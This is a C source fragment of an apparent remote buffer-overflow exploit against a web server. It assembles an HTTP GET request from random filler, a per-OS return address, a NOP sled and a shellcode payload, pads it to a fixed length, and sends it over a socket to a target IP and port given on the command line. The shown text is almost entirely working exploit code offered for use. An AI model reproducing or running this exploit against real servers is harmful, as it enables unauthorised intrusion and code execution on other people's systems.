    if (target < 0 || target >= NTARGETS) {
        fprintf (stderr, "Invalid OS target [!!]\n");
        exit (EXIT_FAILURE);
    }

    /* +1 so the terminating NUL of a PAYLOAD_LENGTH-byte request stays in bounds. */
    char * payload = (char *) calloc (PAYLOAD_LENGTH + 1, sizeof (char));
    if (payload == NULL) {
        perror ("calloc");
        exit (EXIT_FAILURE);
    }
    char rand_text[BUFF_ERR_LENGTH + 1];
    generate_random_text (rand_text, BUFF_ERR_LENGTH);
    snprintf(payload, PAYLOAD_LENGTH + 1, "%s%s%s%s%s",
             GET, rand_text, targets[target], nops, (const char *) pload);

    /* Pad with 'B' so the whole request is exactly PAYLOAD_LENGTH bytes. */
    size_t len = strlen(payload);
    size_t remain = PAYLOAD_LENGTH - len - strlen(HTTP);
    memset (payload + len, 'B', remain);

    strncat (payload, HTTP, PAYLOAD_LENGTH - strlen(payload));

    return payload;
}

int
main(int argc, char ** argv) {

    if (argc < 4) {
        printf ("Usage: %s <target_ip> <port> <target_index>\n\n", argv[0]);
        printf ("target_index:\n");
        for (int i = 0; i < NTARGETS; i++) {
            printf ("  %2d  %s\n", i, target_names[i]);
        }
        exit (EXIT_SUCCESS);
    }
    char * payload = mount_payload (atoi(argv[3]));
    int sockfd = createSocket (argv[1], atoi(argv[2]));

    if (write (sockfd, payload, strlen(payload)) < 0) {
        perror ("write");
    }

    free (payload);
    close(sockfd);

    return 0;
}

--------------------------------------------------------------------------------